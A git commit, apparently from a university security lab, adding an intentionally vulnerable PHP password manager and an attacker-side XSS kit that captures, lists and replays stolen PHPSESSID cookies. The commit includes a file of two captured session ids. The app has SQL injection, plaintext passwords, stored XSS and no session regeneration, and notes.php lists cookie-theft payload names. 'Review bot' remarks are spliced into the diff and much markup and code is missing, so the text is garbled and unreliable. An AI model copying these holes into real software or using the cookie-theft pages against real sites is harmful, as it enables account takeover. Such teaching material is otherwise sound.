commit 61c777f33a2b40b1c024f3be982e7156210c0dce
Author: Christos Choutouridis
Date: Sat Jan 10 17:56:35 2026 +0200
Init commit with passman (and XSS) files aranged as a deployed environment
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..1389499
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,3 @@
+# Generic files
+*.zip
+
diff --git a/passman-dev/db/init/01-create-pwd_mgr-db-withData.sql b/passman-dev/db/init/01-create-pwd_mgr-db-withData.sql
new file mode 100644
index 0000000..89fccd4
--- /dev/null
+++ b/passman-dev/db/init/01-create-pwd_mgr-db-withData.sql
@@ -0,0 +1,65 @@
+-- --------------------------------------------------------
+-- Host: 127.0.0.1
+-- Server version: 10.4.22-MariaDB - mariadb.org binary distribution
+-- Server OS: Win64
+-- HeidiSQL Version: 12.7.0.6850
+-- --------------------------------------------------------
+
+/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
+/*!40101 SET NAMES utf8 */;
+/*!50503 SET NAMES utf8mb4 */;
+/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
+/*!40103 SET TIME_ZONE='+00:00' */;
+/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
+/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
+/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
+
+CREATE DATABASE IF NOT EXISTS `pwd_mgr` /*!40100 DEFAULT CHARACTER SET latin1 */;
+USE `pwd_mgr`;
+
+CREATE TABLE IF NOT EXISTS `dummy` (
+ `id` int(11) DEFAULT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=latin1;
+
+CREATE TABLE IF NOT EXISTS `login_users` (
+ `id` int(11) NOT NULL AUTO_INCREMENT,
+ `username` varchar(20) NOT NULL,
+ `password` varchar(256) NOT NULL DEFAULT '',
+ PRIMARY KEY (`id`),
+ UNIQUE KEY `user` (`username`)
+) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;
+
+INSERT INTO `login_users` (`id`, `username`, `password`) VALUES
+ (1, 'u1', 'p1');
+
+CREATE TABLE IF NOT EXISTS `notes` (
+ `notesid` int(11) NOT NULL AUTO_INCREMENT,
+ `login_user_id` int(11) DEFAULT NULL,
+ `note` varchar(300) NOT NULL,
+ PRIMARY KEY (`notesid`) USING BTREE,
+ KEY `FK_notes-login_users` (`login_user_id`) USING BTREE,
+ CONSTRAINT `FK_notes-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
+) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=latin1;
+
+INSERT INTO `notes` (`notesid`, `login_user_id`, `note`) VALUES
+ (1, 1, 'test1');
+
+CREATE TABLE IF NOT EXISTS `websites` (
+ `webid` int(11) NOT NULL AUTO_INCREMENT,
+ `login_user_id` int(11) DEFAULT NULL,
+ `web_url` varchar(250) NOT NULL,
+ `web_username` varchar(20) NOT NULL DEFAULT '',
+ `web_password` varchar(300) NOT NULL DEFAULT '',
+ PRIMARY KEY (`webid`) USING BTREE,
+ KEY `FK_websites-login_users` (`login_user_id`),
+ CONSTRAINT `FK_websites-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
+) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=latin1;
+
+INSERT INTO `websites` (`webid`, `login_user_id`, `web_url`, `web_username`, `web_password`) VALUES
+ (1, 1, 'www.test.com', 'tom', 'tompass');
+
+/*!40103 SET TIME_ZONE=IFNULL(@OLD_TIME_ZONE, 'system') */;
+/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */;
+/*!40014 SET FOREIGN_KEY_CHECKS=IFNULL(@OLD_FOREIGN_KEY_CHECKS, 1) */;
+/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
+/*!40111 SET SQL_NOTES=IFNULL(@OLD_SQL_NOTES, 1) */;
diff --git a/passman-dev/php/passman/dashboard.php b/passman-dev/php/passman/dashboard.php
new file mode 100644
index 0000000..b5df1f8
--- /dev/null
+++ b/passman-dev/php/passman/dashboard.php
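Review bot: `login_users.password varchar(256)` with the seed row `(1, 'u1', 'p1')` stores the login credential in clear text, and `websites.web_password` does the same with `'tompass'`; if this dump is meant as the deliberately vulnerable lab database, a header comment saying so (`-- Lab fixture: passwords are intentionally stored unhashed`) would stop the next maintainer from treating it as a schema to copy, otherwise the seed should carry a `password_hash()` value. Two smaller points: `login_user_id` is `DEFAULT NULL` on both child tables although every row is meant to belong to a user, so `NOT NULL` would make the FK actually enforce ownership; and the `latin1` default charset on tables that hold user-typed text will mangle non-ASCII usernames and notes, whereas `utf8mb4` matches the `SET NAMES utf8mb4` already at the top of the dump.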
@@ -0,0 +1,126 @@ + + + + + + Dashboard + + + +query($sql_query); + $conn -> close(); + + // After processing, redirect to the same page to clear the form + unset($_POST['new_website']); + unset($_POST['new_username']); + unset($_POST['new_password']); + header("Location: " . $_SERVER['PHP_SELF']); + exit(); +} + +// Check if 'Delete-website' button was selected +if(isset($_POST['delete_website']) && trim($_POST["websiteid"] != '')) { + $webid = trim($_POST["websiteid"]); + + // Delete selected web site + $sql_query = "DELETE FROM websites WHERE webid='{$webid}';"; + //echo $sql_query; + $result = $conn->query($sql_query); + $conn -> close(); + + // After processing, redirect to the same page to clear the form + unset($_POST['websiteid']); + header("Location: " . $_SERVER['PHP_SELF']); + exit(); +} + +// Display list of user's web sites +$sql_query = "SELECT * FROM websites INNER JOIN login_users ON websites.login_user_id=login_users.id WHERE login_users.username='{$username}';"; +//echo $sql_query; +$result = $conn->query($sql_query); + +//echo htmlspecialchars($username); +echo "

Entries of " . $username . "

"; + +if (!empty($result) && $result->num_rows >= 1) { + while ($row = $result -> fetch_assoc()) { + echo ""; + echo "" . + ""; + + echo ""; + + echo ""; + echo "
" . $row["web_url"] . "
Username: " . $row["web_username"] . "Password: " . $row["web_password"] . "
" . + "" . + "

"; + } + + // Free result set + $result -> free_result(); +} else { + echo "

No entries found.

"; +} + +$conn -> close(); + +?> + + +

+

+
+
+
+ +
+

+ Notes - announcements +

+ Logout +

+ Home page + + \ No newline at end of file diff --git a/passman-dev/php/passman/index.html b/passman-dev/php/passman/index.html new file mode 100644 index 0000000..af9a7e3 --- /dev/null +++ b/passman-dev/php/passman/index.html @@ -0,0 +1,59 @@ + + + + + + Password Manager + + + +
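Review bot: The `delete_website` branch deletes by id alone — `DELETE FROM websites WHERE webid='{$webid}'` — so any logged-in user can remove another user's entry by posting its `websiteid`, and the interpolated value is also a SQL-injection point; the listing query further down already scopes to `$username`, so the delete should too: `$stmt = $conn->prepare("DELETE FROM websites WHERE webid=? AND login_user_id=(SELECT id FROM login_users WHERE username=?)"); $stmt->bind_param("is", $webid, $username); $stmt->execute();`. The guard on that branch is also mis-parenthesised, `trim($_POST["websiteid"] != '')` trims the boolean result of the comparison rather than the field, and should read `trim($_POST["websiteid"]) != ''`. The stored `web_url`, `web_username` and `web_password` are echoed into the table without `htmlspecialchars()`, which makes every saved entry a stored-XSS vector; if that is intentional for the exercise, an `// INTENTIONALLY VULNERABLE (stored XSS)` comment on those echoes would say so. The session check, DB connection and the insert query string at the top of this file are garbled in this rendering and could not be reviewed.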

       Password Manager - AUTH-ECE - 2025-2026

+ + +
+         List of Password Manager pages: +
+ + +
+         Testing useful functions: +
+ + +
+         Hacker's side (for using stealing cookies using XSS): + http://localhost/passman/xss +
+ + + \ No newline at end of file diff --git a/passman-dev/php/passman/login.php b/passman-dev/php/passman/login.php new file mode 100644 index 0000000..650ac9a --- /dev/null +++ b/passman-dev/php/passman/login.php @@ -0,0 +1,89 @@ + + + + + + Login Form + + +query($sql_query); + unset($_POST['username']); + unset($_POST['password']); + + if (!empty($result) && $result->num_rows >= 1) { + // Regenerate session ID to prevent session fixation! + //session_regenerate_id(true); + + // Successfully logged in + $_SESSION['username'] = $username; + $_SESSION['loggedin'] = true; + + //while ($row = $result -> fetch_assoc()) { + // print_r($row); + // $_SESSION['user_id'] = $row['id']; + //} + + // Free result set + $result -> free_result(); + $conn -> close(); + + // Redirect to a dashboard page + header("Location: dashboard.php"); + exit; + } else { + $login_message = "Invalid username or password"; + } + + $conn -> close(); + } +} +?> + + +

Password Manager

+
+
+
+ +
+
+ $login_message"; } ?> +

+ Register new user +

+ Home page + + \ No newline at end of file diff --git a/passman-dev/php/passman/logout.php b/passman-dev/php/passman/logout.php new file mode 100644 index 0000000..7899040 --- /dev/null +++ b/passman-dev/php/passman/logout.php @@ -0,0 +1,24 @@ +window.location.href = "login.php";'; +exit(); + +/* +if (session_status() !== PHP_SESSION_ACTIVE) :void +{ + session_start(); + session_unset(); + session_destroy(); + session_write_close(); + setcookie(session_name(), '', 0, '/'); + session_regenerate_id(true); +} +*/ +?> diff --git a/passman-dev/php/passman/notes.php b/passman-dev/php/passman/notes.php new file mode 100644 index 0000000..030917c --- /dev/null +++ b/passman-dev/php/passman/notes.php @@ -0,0 +1,173 @@ + + + + + + Notes - Comments + + + +alert(2); + XSS using string.fromCharCode with ASCII codes + XSS eval of Hex Unicode Escape Sequences + XSS console cookie + XSS steal cookie with fetch + + XSS steal cookie with simpler fetch + or + + // HAS PROBLEM: XSS steal cookie with href redirection + // HAS PROBLEM: XSS steal cookie with img on-error + */ + + // Insert new note + //$sql_query = "INSERT INTO notes (login_user_id,note) VALUES " . + // "((SELECT id FROM login_users WHERE username='{$username}'),('{$new_note}'));"; + + $sql_query = "INSERT INTO notes (login_user_id, note) ". + "VALUES ((SELECT id FROM login_users WHERE username='{$username}'), '{$new_note}')"; + + //echo $sql_query; + + $result = $conn->query($sql_query); + $conn -> close(); + + // After processing, redirect to the same page to clear the form + unset($_POST['new_note']); + header("Location: " . $_SERVER['PHP_SELF']); + exit(); +} + +// Display list of all notes/comments +$sql_query = "SELECT notes.note, login_users.username FROM notes INNER JOIN login_users ON notes.login_user_id=login_users.id;"; +//echo $sql_query; +$result = $conn->query($sql_query); + +echo "
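Review bot: `session_regenerate_id(true)` is commented out directly under the comment explaining that it prevents session fixation, so a session id planted before login stays valid after `$_SESSION['loggedin'] = true`; re-enable it, `session_regenerate_id(true);`, or if the fixation behaviour is part of the exercise, say so in that comment rather than leaving it looking like an oversight. The query string that `$conn->query($sql_query)` executes sits above the visible part of the hunk, but nothing in the success branch calls `password_verify()` and the seed data holds `'p1'` in clear, which suggests the password is compared inside the SQL; a `SELECT id, password FROM login_users WHERE username=?` prepared statement followed by `password_verify($password, $row['password'])` would remove both the plaintext comparison and the injection surface at once. The commented-out loop that would have set `$_SESSION['user_id']` is worth reviving, since `dashboard.php` otherwise has to re-resolve the user by name on every query.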
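Review bot: The visible part of `logout.php` only emits `window.location.href = "login.php";` and exits, while the session teardown (`session_unset`, `session_destroy`, cookie clearing) is inside a `/* ... */` block that would not even parse as written (`if (...) :void {`); if the lines before the redirect, which are not visible in this rendering, do not destroy the session, a stolen `PHPSESSID` keeps working after the victim "logs out". Either restore a working teardown — `session_start(); $_SESSION = []; session_destroy();` before the redirect — or, if the lab relies on logout being ineffective, replace the dead block with a one-line comment stating that, so the commented code is not mistaken for the intended implementation.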

List of notes/comments

"; + +if (!empty($result) && $result->num_rows >= 1) { + while ($row = $result -> fetch_assoc()) { + echo "
"; + echo "
" . $row["note"] . "
"; + echo "
by " . $row["username"] . "
"; + echo "
"; + } + + // Free result set + $result -> free_result(); +} else { + echo "

No entries found.

"; +} + +$conn -> close(); +?> + + +

+

+
+

+ +
+ + Dashboard +

+ Logout + + \ No newline at end of file diff --git a/passman-dev/php/passman/register.php b/passman-dev/php/passman/register.php new file mode 100644 index 0000000..d29e2dd --- /dev/null +++ b/passman-dev/php/passman/register.php @@ -0,0 +1,83 @@ + + + + + + Registration Form + + +
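Review bot: `$row["note"]` and `$row["username"]` are echoed into the page unescaped, and the hunk's own comment block lists the XSS payloads this is meant to demonstrate, so the intent is clear but the code does not say so; a comment on that echo such as `// INTENTIONALLY VULNERABLE (stored XSS lab) — real code would use htmlspecialchars($row["note"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')` would keep the next maintainer from "fixing" the exercise by accident. The INSERT interpolates `{$new_note}` straight into the SQL as well; if injection is not part of the exercise, `$stmt = $conn->prepare("INSERT INTO notes (login_user_id, note) VALUES ((SELECT id FROM login_users WHERE username=?), ?)"); $stmt->bind_param("ss", $username, $new_note); $stmt->execute();` keeps the XSS lab intact while closing that hole. Note also that the listing query has no per-user filter, so every user sees every note, which matches the "Notes - announcements" label on the dashboard and is presumably intended. The form handling and connection setup above the payload comment are not visible in this rendering.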

New user registration

+ +You are already logged in!
"; + echo "Please logout first"; + exit; +} + +if ($_SERVER["REQUEST_METHOD"] === "POST") { + if(!isset($_POST['new_username'], $_POST['new_password']) || trim($_POST['new_username']) =='' || trim($_POST['new_password']) == '') { + $login_message = "Missing username or password."; + } + else { + // Get user submitted information + $new_username = trim($_POST['new_username']); + $new_password = trim($_POST['new_password']); + + mysqli_report(MYSQLI_REPORT_OFF); // disable exceptions + + // Connect to the database + $conn=mysqli_connect("localhost","root","","pwd_mgr"); + // Check connection + if (mysqli_connect_errno()) { + echo "Failed to connect to MySQL: " . mysqli_connect_error(); + exit(); + } + + // Insert a new user + $sql_query = "INSERT INTO login_users (username,password) VALUES ('{$new_username}','{$new_password}');"; + //echo $sql_query; + + $result = $conn->query($sql_query); + + unset($_POST['new_username']); + unset($_POST['new_password']); + + if ($result == true) { + echo "Successful registration!"; + echo "

You can now use the login page"; + exit; + } + else + $login_message = "Error, probably user already exists!"; + + // Free result set + $conn -> close(); + } +} +?> + + + +

+

+
+
+ +
+ +
+ + $login_message"; + echo "

Go to the login page"; + } + ?> + + + \ No newline at end of file diff --git a/passman-dev/php/xss/getcookie.php b/passman-dev/php/xss/getcookie.php new file mode 100644 index 0000000..2ff3a76 --- /dev/null +++ b/passman-dev/php/xss/getcookie.php @@ -0,0 +1,47 @@ + + + + + + Get a cookie + + + +
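Review bot: The password is stored exactly as typed — `INSERT INTO login_users (username,password) VALUES ('{$new_username}','{$new_password}')` — and both values are interpolated into the SQL, so registration is simultaneously a plaintext-credential store and an injection point; unless this is deliberately part of the lab (in which case mark it with a comment), hash with `password_hash()` and bind the parameters as below, switching `login.php` to `password_verify()` in the same change. On the visible lines, `$result == true` should be `$result === true` (mysqli `query()` returns `true` for an INSERT, and the loose compare would also accept a result object), and the success branch `exit`s before `$conn->close()` is reached. The connection is opened as `root` with an empty password hard-coded in the page; a dedicated `pwd_mgr` account read from the environment would keep even lab DB credentials out of the repository.
```php
// … unchanged: connection setup and input checks …
$stmt = $conn->prepare("INSERT INTO login_users (username, password) VALUES (?, ?)");
$hash = password_hash($new_password, PASSWORD_DEFAULT);
$stmt->bind_param("ss", $new_username, $hash);
$result = $stmt->execute();
// … unchanged: unset($_POST[...]) and result handling …
```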

Get a cookie

+ + + + + + \ No newline at end of file diff --git a/passman-dev/php/xss/index.html b/passman-dev/php/xss/index.html new file mode 100644 index 0000000..133aaa6 --- /dev/null +++ b/passman-dev/php/xss/index.html @@ -0,0 +1,36 @@ + + + + + + XSS for Password Manager + + + +

       XSS for Password Manager

+ + +
+         List of pages: +
+ + + \ No newline at end of file diff --git a/passman-dev/php/xss/listcookies.php b/passman-dev/php/xss/listcookies.php new file mode 100644 index 0000000..1d4b1ea --- /dev/null +++ b/passman-dev/php/xss/listcookies.php @@ -0,0 +1,62 @@ + + + + + + List stolen cookies + + + +

      List of 'stolen' cookies

+ +modify('+2 minutes'); // Add 2 minutes + $expiration = $expires->format('D, d M Y H:i:s') . ' GMT'; +*/ + // Process each line + echo "
    "; + + $cookie_name = "PHPSESSID="; + foreach ($cookie_data as $line) { + // Split the cookies in each line by semicolon + $cookies = explode(';', $line); + + // List each cookie separately + foreach ($cookies as $cookie) { + $cookie = trim($cookie); + // Check for PHPSESSID=... cookie + if (strpos($cookie, $cookie_name) === 0) { + // Get PHPSESSID cookie value + $cookie = str_replace("PHPSESSID=", "", trim($cookie)); + echo "
  1. "; + echo ""; + echo "PHPSESSID=" . htmlspecialchars($cookie) . ""; + echo "
  2. "; + } else { + // Cookie does not contain PHPSESSID value + echo "
  3. "; + echo " Skipping cookie: " . htmlspecialchars($cookie); + echo "
  4. "; + } + } + } + + echo "
"; +} else { + // Error message if file does not exist + echo "

Cookie file not found.

"; +} +?> + + + \ No newline at end of file diff --git a/passman-dev/php/xss/stolencookies.txt b/passman-dev/php/xss/stolencookies.txt new file mode 100644 index 0000000..92e4006 --- /dev/null +++ b/passman-dev/php/xss/stolencookies.txt @@ -0,0 +1,2 @@ +PHPSESSID=knjfug3u4gavdas9o4eupe38l1; seclab_user=u1 +seclab_user=u1; PHPSESSID=o1mg400lipd2mck69kpfnl6p5s diff --git a/passman-dev/php/xss/usecookie.php b/passman-dev/php/xss/usecookie.php new file mode 100644 index 0000000..729daba --- /dev/null +++ b/passman-dev/php/xss/usecookie.php @@ -0,0 +1,59 @@ + + + + + + + + Test of using a stolen cookie + + + +
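Review bot: `str_replace("PHPSESSID=", "", trim($cookie))` removes every occurrence of the prefix rather than only the leading one, so a value that happens to contain that text again would be corrupted; since the branch has already established `strpos($cookie, $cookie_name) === 0`, the precise form is `$cookie = substr($cookie, strlen($cookie_name));` (and `str_starts_with($cookie, $cookie_name)` reads better than the `strpos` compare on PHP 8). Output is correctly passed through `htmlspecialchars()`, which matters here because the file contents are whatever the capture endpoint recorded from an attacker-controlled request. The code that reads the file into `$cookie_data` is above the visible part of the hunk and could not be checked for the same care.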
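Review bot: This commits two captured `PHPSESSID` values next to the PHP that serves them; if `passman-dev/php` is the document root, as the `http://localhost/passman/xss` link in `passman/index.html` suggests, `stolencookies.txt` is fetchable by anyone as static text. The capture file should live outside the docroot (or be denied by the web server), be added to `.gitignore` alongside the existing `*.zip` pattern, and be created empty by the capture script; if an example is wanted, put the two sample lines in a README instead. The ids are presumably expired lab values, but a committed file literally named "stolen cookies" is exactly what secret scanners flag.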

Test of using a stolen cookie

+ Bypassing authentication and impersonating another user by using a stolen cookie
+ +PHPSESSID=" . session_id() . "
"; + +/* +if (isset($_SESSION['loggedin']) && $_SESSION['username'] !== '') { + echo "Username: " . $_SESSION['username'] . "
"; + echo "Logged in: " . $_SESSION['loggedin'] . "
"; +} +else { + echo "session variables expired"; +} +*/ +// If session parameter is not set, set it to: 'undefined ...' +$username = $_SESSION['username'] ?? 'undefined (session variable expired)'; +$loggedin = $_SESSION['loggedin'] ?? 'undefined (session variable expired)'; +echo "Username: " . $username . "
"; +echo "Logged in flag: " . $loggedin . "
"; +?> + +
+ If all above session parameters are defined, try accessing the + dashboard + +

+ List cookies + + + \ No newline at end of file diff --git a/Εργασία-Ασφάλειας 2025-2026.pdf b/Εργασία-Ασφάλειας 2025-2026.pdf new file mode 100644 index 0000000..6cfb3d0 Binary files /dev/null and b/Εργασία-Ασφάλειας 2025-2026.pdf differ
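Review bot: `echo "Username: " . $username` writes the session's username into the page unescaped, and `register.php` in this commit accepts any string as a username, so the page that demonstrates session hijacking is itself injectable by whoever registered the hijacked account; `echo "Username: " . htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');` closes that without changing what the demo shows. `session_id()` is echoed the same way; it is server-generated, but wrapping it too keeps the rule uniform, and `$loggedin` is a bool so it prints as `1` rather than `true` — `var_export($loggedin, true)` would show what the session actually holds. The commented-out block above the `??` fallbacks duplicates them and can be deleted.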